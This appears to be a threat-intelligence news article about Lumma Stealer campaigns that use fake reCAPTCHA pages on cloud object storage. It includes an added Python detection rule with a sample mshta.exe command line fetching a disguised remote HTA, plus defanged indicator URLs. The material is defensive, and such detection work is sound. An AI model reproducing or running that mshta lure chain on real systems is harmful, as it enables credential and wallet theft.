Russian Hackers Exploit Oracle Cloud Infrastructure to Target Scaleway Object Storage
Russian threat actors have been leveraging trusted cloud infrastructure platforms like Oracle Cloud Infrastructure (OCI) Object Storage and Scaleway Object Storage to propagate sophisticated attacks using the Lumma Stealer malware.
This malware-as-a-service (MaaS) infostealer, also known as LummaC2 Stealer, targets Windows systems to siphon credentials, system data, and cryptocurrency wallets.
Investigations conducted in 2025 reveal a calculated shift in delivery mechanisms, with attackers exploiting fake reCAPTCHA pages hosted on legitimate cloud services to trick users, particularly high-access individuals within organizations, into executing malicious commands.

The use of developer-friendly platforms like OCI and Scaleway, coupled with the targeting of privileged users, raises significant concerns about potential lateral movement and deeper network compromise within enterprise environments.
Evolving Tactics of Lumma Stealer Campaigns
Since February 2025, threat actors have been observed using Tigris Object Storage to host deceptive reCAPTCHA pages that prompt users to execute malicious PowerShell commands via the Windows Run dialog (Windows + R).
These commands, often obfuscated and copied to the clipboard, silently launch legitimate binaries like mshta.exe to fetch trojans disguised as benign files, such as “sports[.]mp4” from suspicious domains with top-level domains (TLDs) like .shop.
By March, the campaign had extended to OCI Object Storage, and by May 2025, Scaleway Object Storage became the latest platform exploited for hosting similar malicious content.
Analysis of Document Object Model (DOM) samples from these pages uncovered Russian-language comments, with phrases like “Garbage HTML code” and “Obfuscated code with garbage decoy functions”, suggesting a possible connection to Russian-speaking attackers.
While not conclusive evidence of attribution, these annotations indicate a deliberate effort to mislead security analysts and streamline the attackers’ workflow for debugging and collaboration.
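The execution chain described above (a Run-dialog launch of mshta.exe that fetches an HTA disguised as a media file from a .shop domain) is the kind of behaviour endpoint telemetry can flag. The following detection logic is an added example, not code from the original report; the event records are constructed in the shape of Sysmon process-creation fields, and the domain, TLD watchlist and extension list are assumptions chosen to mirror the campaign rather than real indicators.

```python
import os
import re
from urllib.parse import urlparse

# Constructed Sysmon-style (Event ID 1) process-creation records, not real telemetry.
SAMPLE_EVENTS = [
    # ClickFix pattern: Run dialog (explorer.exe) -> mshta.exe fetching a ".mp4" that is really an HTA
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://placeholder-lure.shop/sports.mp4'},
    # Benign: an installer running a local help HTA
    {"ParentImage": r"C:\Program Files\Vendor\setup.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\help.hta"'},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe"}  # Run dialog / shell launches
SUSPECT_TLDS = {"shop"}                       # assumed watchlist; the campaign used .shop
DISGUISE_EXTS = {".mp4", ".mp3", ".jpg", ".png", ".pdf", ".txt"}  # HTA served under a benign-looking name

def score_event(ev):
    """Return the reasons this process-creation event looks like a ClickFix mshta lure ([] if none)."""
    reasons = []
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    if image != "mshta.exe":
        return reasons
    urls = URL_RE.findall(ev["CommandLine"])
    if not urls:
        return reasons  # local HTA file; out of scope for this rule
    reasons.append("mshta.exe fetching remote content")
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    if parent in INTERACTIVE_PARENTS:
        reasons.append(f"launched from interactive shell ({parent})")
    for url in urls:
        parsed = urlparse(url)
        tld = parsed.hostname.rsplit(".", 1)[-1].lower() if parsed.hostname else ""
        if tld in SUSPECT_TLDS:
            reasons.append(f"watchlisted TLD .{tld}")
        ext = os.path.splitext(parsed.path)[1].lower()
        if ext in DISGUISE_EXTS:
            reasons.append(f"HTA disguised as {ext}")
    return reasons

def detect(events):
    """Return (index, reasons) for every event that triggers at least one reason."""
    return [(i, r) for i, ev in enumerate(events) if (r := score_event(ev))]

if __name__ == "__main__":
    for idx, why in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {'; '.join(why)}")
```

Scoring on several weak signals together (remote fetch, interactive parent, extension mismatch) keeps a single legitimate mshta use from alerting while the full lure chain still does.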

This exploitation of trusted infrastructure not only aids in evading initial detection but also capitalizes on Scaleway’s relatively lower security visibility compared to other widely monitored platforms, allowing malicious content to persist longer.
Cloud Provider Response
Further compounding the issue, Lumma Stealer campaigns have diversified their targets, with earlier efforts in 2024 focusing on gaming enthusiasts via malvertising and Steam impersonation, now evolving to exploit technically proficient users in 2025.
According to the report, security measures by Cato Networks, through its MDR service, have proactively blocked redirection attempts to these fake reCAPTCHA pages using high-confidence IPS rules, safeguarding users before interaction.
Responses from the affected cloud providers vary: Tigris confirmed the removal of reported malicious content and published guidelines on combating platform abuse, Scaleway took steps to eliminate the fake pages from their infrastructure, while Oracle has yet to respond.
The persistent evolution of Lumma Stealer delivery tactics underscores the critical need for continuous behavioral analysis and contextual detection to counter such threats.
As attackers leverage trusted environments to bypass traditional defenses, organizations must remain vigilant, adopting advanced threat intelligence and prevention mechanisms to protect against these sophisticated campaigns.
Indicators of Compromise (IoCs)
| Type | Indicator | Description |
|---|---|---|
| URL | objectstorage[.]ap-seoul-1[.]oraclecloud[.]com/n/id0cu93izlqm/b/need-to-complete-this/o/dest[.]html | Hosting malicious CAPTCHA |
| URL | datastream-dist[.]s3[.]pl-waw[.]scw[.]cloud/pass-this-for-access-prism[.]html | Hosting malicious CAPTCHA |
| URL | amacys[.]shop/sports[.]mp4 | Malicious HTA masqueraded as another file type |